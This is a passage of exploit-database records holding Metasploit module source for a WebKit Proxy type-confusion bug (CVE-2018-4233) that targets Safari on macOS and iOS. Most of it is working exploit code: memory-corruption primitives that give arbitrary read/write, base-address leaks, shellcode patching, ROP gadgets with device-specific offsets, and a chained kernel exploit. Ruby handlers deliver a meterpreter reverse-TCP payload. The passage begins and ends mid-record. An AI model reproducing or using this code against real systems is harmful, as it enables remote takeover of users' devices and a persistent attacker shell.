function(oldVal, newVal) {\n for (var idx = 0; idx < this.length; idx++) {\n var found = true;\n for (var j = idx; j < idx + 8; j++) {\n if (this[j] != oldVal.byteAt(j - idx)) {\n found = false;\n break;\n }\n }\n if (found)\n break;\n }\n this.set(newVal.bytes(), idx);\n};\n#{stage2_js}\n#{utils}\n#{int64}\n#{offsets}\n\nvar ready = new Promise(function(resolve) {\n if (typeof(window) === 'undefined')\n resolve();\n else\n window.onload = function() {\n resolve();\n }\n});\n\nready = Promise.all([ready]);\n\nprint = function(msg) {\n //console.log(msg);\n //document.body.innerText += msg + '\\\\n';\n}\n\n// Must create this indexing type transition first,\n// otherwise the JIT will deoptimize later.\nvar a = [13.37, 13.37];\na[0] = {};\n\nvar referenceFloat64Array = new Float64Array(0x1000);\n\n//\n// Bug: the DFG JIT does not take into account that, through the use of a\n// Proxy, it is possible to run arbitrary JS code during the execution of a\n// CreateThis operation. This makes it possible to change the structure of e.g.\n// an argument without causing a bailout, leading to a type confusion.\n//\n\n//\n// addrof primitive\n//\nfunction setupAddrof() {\n function InfoLeaker(a) {\n this.address = a[0];\n }\n\n var trigger = false;\n var leakme = null;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = leakme;\n return target[propname];\n },\n };\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\n }\n\n trigger = true;\n\n return function(obj) {\n leakme = obj;\n arg = [1.1, 1.1];\n var o = new InfoLeakerProxy(arg);\n return o.address;\n };\n}\n\n//\n// fakeobj primitive\n//\nfunction setupFakeobj() {\n function ObjFaker(a, address) {\n a[0] = address;\n }\n\n var trigger = false;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = {};\n return target[propname];\n },\n };\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\n }\n\n trigger = true;\n\n return function(address) {\n arg = [1.1, 1.1];\n var o = new ObjFakerProxy(arg, address);\n return arg[0];\n };\n}\n\nfunction makeJITCompiledFunction() {\n // Some code to avoid inlining...\n function target(num) {\n for (var i = 2; i < num; i++) {\n if (num % i === 0) {\n return false;\n }\n }\n return true;\n }\n\n // Force JIT compilation.\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n return target;\n}\n\nfunction pwn() {\n // Spray Float64Array structures so that structure ID 0x1000 will\n // be a Float64Array with very high probability\n var structs = [];\n for (var i = 0; i < 0x1000; i++) {\n var a = new Float64Array(1);\n a['prop' + i] = 1337;\n structs.push(a);\n }\n\n // Setup exploit primitives\n var addrofOnce = setupAddrof();\n var fakeobjOnce = setupFakeobj();\n\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\n /*\n var stuff = [];\n for (var i = 0; i < 0x100000; i++) {\n stuff.push({foo: i});\n }\n */\n\n var float64MemView = new Float64Array(0x200);\n var uint8MemView = new Uint8Array(0x1000);\n\n // Setup container to host the fake Float64Array\n var jsCellHeader = new Int64([\n 00, 0x10, 00, 00, // m_structureID\n 0x0, // m_indexingType\n 0x2b, // m_type\n 0x08, // m_flags\n 0x1 // m_cellState\n ]);\n\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: null,\n vector: float64MemView,\n length: (new Int64('0x0001000000001337')).asJSValue(),\n mode: {}, // an empty object, we'll need that later\n };\n\n // Leak address and inject fake object\n // RawAddr == address in float64 form\n var containerRawAddr = addrofOnce(container);\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\n\n ///\n /// BEGIN CRITICAL SECTION\n ///\n /// Objects are corrupted, a GC would now crash the process.\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\n ///\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\n while (!(driver instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue();\n }\n\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\n // property of the container to leak addresses.\n driver[2] = containerRawAddr;\n var emptyObjectRawAddr = float64MemView[6];\n container.mode = referenceFloat64Array;\n var referenceFloat64ArrayRawAddr = float64MemView[6];\n\n // Fixup the JSCell header of the container to make it look like an empty object.\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\n driver[2] = emptyObjectRawAddr;\n var header = float64MemView[0];\n driver[2] = containerRawAddr;\n float64MemView[0] = header;\n\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\n driver[2] = referenceFloat64ArrayRawAddr;\n var header = float64MemView[0];\n var length = float64MemView[3];\n var mode = float64MemView[4];\n driver[2] = containerRawAddr;\n float64MemView[2] = header;\n float64MemView[3] = 0;\n float64MemView[5] = length;\n float64MemView[6] = mode;\n\n // Root the container object so it isn't garbage collected.\n // This will allocate a butterfly for the fake object and store a reference to the container there.\n // The fake array itself is rooted by the memory object (closures).\n driver.container = container;\n\n ///\n /// END CRITICAL SECTION\n ///\n /// Objects are repaired, we will now survive a GC\n ///\n if (typeof(gc) !== 'undefined')\n gc();\n\n memory = {\n read: function(addr, length) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n var a = new Array(length);\n for (var i = 0; i < length; i++)\n a[i] = uint8MemView[i];\n return a;\n },\n\n write: function(addr, data) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n for (var i = 0; i < data.length; i++)\n uint8MemView[i] = data[i];\n },\n\n read8: function(addr) {\n driver[2] = addr.asDouble();\n return Int64.fromDouble(float64MemView[0]);\n },\n\n write8: function(addr, value) {\n driver[2] = addr.asDouble();\n float64MemView[0] = value.asDouble();\n },\n\n addrof: function(obj) {\n float64MemView.leakme = obj;\n var butterfly = Int64.fromDouble(driver[1]);\n return memory.read8(Sub(butterfly, 0x10));\n },\n };\n\n print(\"[+] Got stable memory read/write!\");\n\n // Find binary base\n var funcAddr = memory.addrof(Math.sin);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n var codeAddr = memory.read8(Add(executableAddr, 24));\n var vtabAddr = memory.read8(codeAddr);\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\n\n var dyldStubLoaderAddr = memory.read8(jscBase);\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\n print(\"[*] dyld.dylib @ \" + dyldBase);\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\n\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\n print(\"[*] confstr @ \" + confstrAddr);\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\n print(\"[*] dlopen @ \" + dlopenAddr);\n\n // Patching shellcode\n var stage2Addr = memory.addrof(stage2);\n stage2Addr = memory.read8(Add(stage2Addr, 16));\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\n\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\n print(\"[+] Shellcode patched\");\n\n // Leak JITCode pointer poison value\n var poison_addr = Add(jscBase, 305152);\n print(\"[*] Poison value @ \" + poison_addr);\n var poison = memory.read8(poison_addr);\n print(\"[*] Poison value: \" + poison);\n\n // Shellcode\n var func = makeJITCompiledFunction();\n var funcAddr = memory.addrof(func);\n print(\"[+] Shellcode function object @ \" + funcAddr);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n print(\"[+] Executable instance @ \" + executableAddr);\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\n\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\n var codeAddr = Xor(codeAddrPoisoned, poison);\n print(\"[+] RWX memory @ \" + codeAddr.toString());\n print(\"[+] Writing shellcode...\");\n var origCode = memory.read(codeAddr, stage1.length);\n memory.write(codeAddr, stage1);\n\n print(\"[!] Jumping into shellcode...\");\n var res = func();\n if (res === 0) {\n print(\"[+] Shellcode executed sucessfully!\");\n } else {\n print(\"[-] Shellcode failed to execute: error \" + res);\n }\n\n memory.write(codeAddr, origCode);\n print(\"[*] Restored previous JIT code\");\n\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\n if (typeof(gc) !== 'undefined')\n gc();\n}\n\nready.then(function() {\n try {\n pwn();\n } catch (e) {\n print(\"[-] Exception caught: \" + e);\n }\n}).catch(function(err) {\n print(\"[-] Initializatin failed\");\n});\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\n end\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb"}, {"lastseen": "2020-12-30T05:06:23", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.\n", "published": "2019-06-02T02:19:24", "type": "metasploit", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13861", "CVE-2018-4233"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? '\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' 